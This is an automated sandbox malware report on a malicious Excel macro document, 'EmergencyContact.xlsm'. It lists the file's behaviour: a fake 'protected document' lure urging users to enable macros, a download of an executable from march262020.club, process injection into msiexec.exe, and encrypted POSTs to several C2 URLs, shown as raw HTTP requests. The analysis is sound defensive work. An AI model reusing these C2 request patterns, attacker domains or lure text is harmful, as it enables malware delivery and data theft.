Loading ...

Play interactive tourEdit tour

Analysis Report EmergencyContact.xlsm

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:218575
Start date:27.03.2020
Start time:18:28:17
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 16s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:EmergencyContact.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.expl.evad.winXLSM@6/5@10/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 61.5% (good quality ratio 60.6%)
  • Quality average: 87.2%
  • Quality standard deviation: 20.6%
HCA Information:
  • Successful, ratio: 70%
  • Number of executed functions: 75
  • Number of non-executed functions: 127
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100falsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through API2Registry Run Keys / Startup Folder1Access Token Manipulation1Masquerading1Credential DumpingVirtualization/Sandbox Evasion1Remote File Copy12Data from Local SystemData Encrypted1Standard Cryptographic Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExploitation for Client Execution33Port MonitorsProcess Injection412Disabling Security Tools1Network SniffingProcess Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesGraphical User Interface1Accessibility FeaturesPath InterceptionSoftware Packing2Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingVirtualization/Sandbox Evasion1Credentials in FilesFile and Directory Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol123SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessAccess Token Manipulation1Account ManipulationSystem Information Discovery13Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceProcess Injection412Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskObfuscated Files or Information2Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Signature Overview

Click to jump to signature section


Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeJump to behavior
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeJump to behavior
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]2_2_00428900
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then call 00419D40h2_2_00423380
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then mov esi, eax2_2_00424440
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi]2_2_00423C00
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_0041D660
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then cmp word ptr [eax], cx2_2_00426E00
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then movzx ecx, byte ptr [eax]2_2_0041EF50
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then cmp word ptr [eax], cx2_2_003E7050
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_003DD8B0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then movzx ecx, byte ptr [eax]2_2_003DF1A0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]2_2_003E8B50
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then call 003D9F90h2_2_003E35D0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi]2_2_003E3E50
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 4x nop then mov esi, eax2_2_003E4690
Source: C:\Windows\System32\msiexec.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]4_2_00098900
Source: C:\Windows\System32\msiexec.exeCode function: 4x nop then call 00089D40h4_2_00093380
Source: C:\Windows\System32\msiexec.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi]4_2_00093C00
Source: C:\Windows\System32\msiexec.exeCode function: 4x nop then mov esi, eax4_2_00094440
Source: C:\Windows\System32\msiexec.exeCode function: 4x nop then cmp word ptr [eax], cx4_2_00096E00
Source: C:\Windows\System32\msiexec.exeCode function: 4x nop then mov byte ptr [edi], bl4_2_0008D660
Source: C:\Windows\System32\msiexec.exeCode function: 4x nop then movzx ecx, byte ptr [eax]4_2_0008EF50
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: march262020.club
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49160 -> 170.106.11.8:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49160 -> 170.106.11.8:80

Networking:

barindex
Found C&C like URL patternShow sources
Source: global trafficHTTP traffic detected: POST /post.php HTTP/1.1Accept: */*Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.clubContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO|R>o7
Source: global trafficHTTP traffic detected: POST /post.php HTTP/1.1Accept: */*Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.comContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO|R>o7
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 27 Mar 2020 17:30:37 GMTContent-Type: application/octet-streamContent-Length: 245248Connection: keep-aliveLast-Modified: Fri, 27 Mar 2020 15:28:13 GMTETag: "3be00-5a1d7bfe43d40"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 c4 7b 9f dc a5 15 cc dc a5 15 cc dc a5 15 cc c2 f7 91 cc c3 a5 15 cc c2 f7 80 cc fd a5 15 cc c2 f7 96 cc 5d a5 15 cc fb 63 6e cc db a5 15 cc dc a5 14 cc 58 a5 15 cc c2 f7 9f cc dd a5 15 cc c2 f7 81 cc dd a5 15 cc c2 f7 84 cc dd a5 15 cc 52 69 63 68 dc a5 15 cc 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 87 c4 19 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 de 02 00 00 c0 0b 00 00 00 00 00 6c 2c 00 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 0e 00 00 04 00 00 f6 50 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 28 03 00 50 00 00 00 00 30 0e 00 40 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 02 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 dc 02 00 00 10 00 00 00 de 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 88 43 00 00 00 f0 02 00 00 44 00 00 00 e2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 48 ee 0a 00 00 40 03 00 00 1a 00 00 00 26 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 7c 00 00 00 30 0e 00 00 7e 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /files/app.bin HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: march262020.clubConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /post.php HTTP/1.1Accept: */*Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.clubContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO|R>o7
Source: global trafficHTTP traffic detected: POST /post.php HTTP/1.1Accept: */*Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.comContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO|R>o7
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C257964.jpegJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /files/app.bin HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: march262020.clubConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: march262020.club
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /post.php HTTP/1.1Accept: */*Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.clubContent-Length: 300Connection: CloseData Raw: 4f cd 84 d2 98 00 5b e9 f6 df 3a 88 34 f6 f1 c1 7a 48 4e 84 e8 8d d3 5b 6d 83 8e 85 a8 2e 7f 64 4a e0 c9 c6 98 59 d6 d6 3a 1f 59 d1 4c 75 2f 3a c1 90 a3 f3 f8 bd 4c 3d df 22 7b a1 44 86 d7 f1 40 67 37 24 a4 bf 67 28 7c 5e e7 cb cc 51 b6 7d 48 fc fa 51 8d e7 66 46 49 00 3c ef 79 17 bb e5 3f b3 26 7b 07 a2 58 86 55 16 36 26 85 fb 18 5e fc 3e a7 b1 2e 6f 9c a5 0d 65 2c 9e dd 97 68 ab 0c 3c 14 c3 43 1e f2 6c fe 4e 3d c4 aa 49 a8 cb 07 7d 6d f9 47 33 89 c7 41 6e bc 39 c9 4b 67 31 99 14 16 0a 5f 95 2c a1 e4 3e dd 3a 4f 75 eb b0 a7 49 e5 ae 64 cb b9 11 1d df 64 53 c1 af 8c a2 09 ea 46 32 86 5e d0 ef ed d5 d3 de 1b 22 0b 69 5f ef 58 5a b2 c7 04 19 ed 82 d9 a4 5d 86 94 21 8f a5 ba 04 e7 bf 3a 5e c0 ce 3f f6 3e 63 8a a8 72 b2 ba 92 b4 b4 60 f4 81 bc 32 1c 0d 57 19 94 92 39 4c ec ad 6d f8 27 71 08 b8 a9 c8 d2 33 b2 49 5c 5c f5 ce 9e 44 a5 1d f0 57 4f 0c 7c 52 be 3e cd 9a b5 6f 37 e7 a1 bb ae 00 c3 Data Ascii: O[:4zHN[m.dJY:YLu/:L="{D@g7$g(|^Q}HQfFI<y?&{XU6&^>.oe,h<ClN=I}mG3An9Kg1_,>:OuIddSF2^"i_XZ]!:^?>cr`2W9Lm'q3I\\DWO|R>o7
Urls found in memory or binary dataShow sources
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.best/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.club/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.com/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.live/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.live/post.phpU
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.live/post.phpcs
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.network/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.online/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.site/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.store/post.php
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://march262020.tech/post.php
Source: msiexec.exe, 00000004.00000002.1503895928.0051B000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://www.march262020.live/post.php
Source: msiexec.exe, 00000004.00000002.1503895928.0051B000.00000004.00000020.sdmpString found in binary or memory: http://www.march262020.live/post.php-
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://www.march262020.live/post.phpAS
Source: msiexec.exe, 00000004.00000002.1484395512.004BC000.00000004.00000020.sdmpString found in binary or memory: http://www.march262020.live/post.phph

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing" and then "Enable Content' on the yelbw bar above to display the content. 18 19 D
Source: Screenshot number: 4Screenshot OCR: PROTECTED DOCUMENT ' I 6 7 : , CANTVEIWTHE CONTENT? &EAQ1HEMQWSIEES 10 11 1. Openthe documenti
Source: Screenshot number: 4Screenshot OCR: Enable Content' on the yelbw bar above to display the content. 18 19 D CI Cl 20 21 22 23 24
Source: Document image extraction number: 0Screenshot OCR: Enable Editing" and then "Enable Content" on the yellow bar above to displaythe content.
Source: Document image extraction number: 0Screenshot OCR: protected documents. 2. Use a Desktop or Laptop. Protected documentdo notwork on mobile phones ort
Source: Document image extraction number: 0Screenshot OCR: Enable Content" on the yellow bar above to displaythe content.
Source: Document image extraction number: 1Screenshot OCR: PROTECTED DOCUMENT cANryE[!utiEm!yIE!ylzmc!IHEmQwsTEps I. Openthe document in Microsoft Office. P
Source: Document image extraction number: 1Screenshot OCR: Enable ContenT on the yellow bar above to display the content.
Detected potential crypto functionShow sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_0040ABC02_2_0040ABC0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_004034A02_2_004034A0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_0040A7E02_2_0040A7E0
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_003CAA302_2_003CAA30
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_003CAE102_2_003CAE10
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeCode function: 2_2_003C36F02_2_003C36F0
Source: C:\Windows\System32\msiexec.exeCode function: 4_2_0007ABC04_2_0007ABC0
Source: C:\Windows\System32\msiexec.exeCode function: 4_2_000734A04_2_000734A0
Source: C:\Windows\System32\msiexec.exeCode function: 4_2_0007A7E04_2_0007A7E0
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@6/5@10/2
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Windows\System32\msiexec.exeCode function: 4_2_00092080 AdjustTokenPrivileges,CloseHandle,4_2_00092080
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$EmergencyContact.xlsmJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\{63BC39C8-1AFC-D9E5-83D4-5C1F23358D0A}
Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\{F32D0B54-2860-4974-83D4-5C1F23358D0A}
Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\{43C409C8-2AFC-F99D-83D4-5C1F23358D0A}
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR1215.tmpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe 'C:\cYNhYPc\mVVJuWs\FTBSEIi.exe'
Source: unknownProcess created: C:\Windows\System32\msiexec.exe msiexec.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Imed\tufi.exe 'C:\Users\user\AppData\Roaming\Imed\tufi.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe 'C:\cYNhYPc\mVVJuWs\FTBSEIi.exe' Jump to behavior
